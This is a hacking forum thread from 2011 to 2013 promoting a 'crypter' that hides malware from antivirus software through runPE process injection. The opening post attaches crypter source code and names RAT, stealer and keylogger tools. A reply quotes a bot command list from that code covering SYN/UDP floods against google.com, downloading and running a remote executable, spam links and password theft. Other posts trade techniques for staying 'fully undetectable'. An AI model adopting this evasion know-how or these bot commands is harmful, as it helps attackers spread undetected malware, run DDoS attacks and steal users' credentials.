cipher Posted January 5, 2011 Posted January 5, 2011 hello i am here today with the executable that can obfuscate the virus and makes it fully undetectable from anti-viruses.This executable uses runPE techniques to inject into other process and to dump the crypted code into memory and hence the executable's code remain undetected by Anti-viruses. These crypters are programmed by individuals and hence remains undetected most of the time .Mostly they are coded in VB or .Net and hence you will find most of the viruses showing vb attributes during PE Scans ,but mostly the viruses/RATs/Stealers/Bots/Worms are coded in borland Delphi.Examples :1) RATS : cybergate,Blackshades,pixel,spynet,darkcomet etc2) STEALERS : Istealer v6.0(latest),Albertino,maya password stealer etc3) KEYLOGGERS : Albertino , Rapzo ,Irtech etc4) Crypters : icrypt , galaxy ,balckout AIO,demon ,cypherx(www.crypters.net) etc.The sample crypter source code is attached here .CodingNation_Crypter_Source.rar
k5h Posted March 30, 2011 Posted March 30, 2011 http://www.virustotal.com/file-scan/report.html?id=7d389377a5bf54147bc675df8a1ca0742991224b3c21e1ad7aa131e6b81575fc-1301452801http://www.virustotal.com/file-scan/report.html?id=a77380725c96204df0bbad34a715358b1e193989f3e9053cefe80a73ad19816c-1301452813i think the below code must not be present in a crypter project this makes it behave like a bothello [login].bai [logout].removeAll [removes ALL bots]DDoS CMDs./syn (google.com 80 1000)./udp (google.com 80 1000) Careful might destroy botsDownload/Update./download (http://site.com/file.exe C:\file.exe 1)./update (????)MSC./msnmsg (hey is this you? www.yoursite.com)./visit (http://site.com/)./pstore (all pswds)./pstoreS (./pstoreS paypal: searches paypal)
Blue Posted June 1, 2011 Posted June 1, 2011 @Cipher : Thanks Mate, but old guddys i played with them when I was learning CEH. This guddys are no more, for example in our team ICA, we dont use like this.Try the self mod version of Fly Crypter.And also nice name collection of RAT's.@ksanket : These codes are not used to make behave like a bot, this codes are part of Trojan or stealer's.
cipher Posted July 22, 2011 Author Posted July 22, 2011 @Blue indian : i guess you are talking about polymorphic engine , but still 99% of the crypters in market uses the same PE injection technique.i Dunno much about the polymorphic engine tho still they manage to make it FUD by adding junk code , by changing the variable names and by some advanced techniques.
eliasxxlturbo Posted May 6, 2013 Posted May 6, 2013 Thanks for share friend you is rox !! nice Cryter's collection
Recommended Posts
Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
Register a new accountSign in
Already have an account? Sign in here.
Sign In Now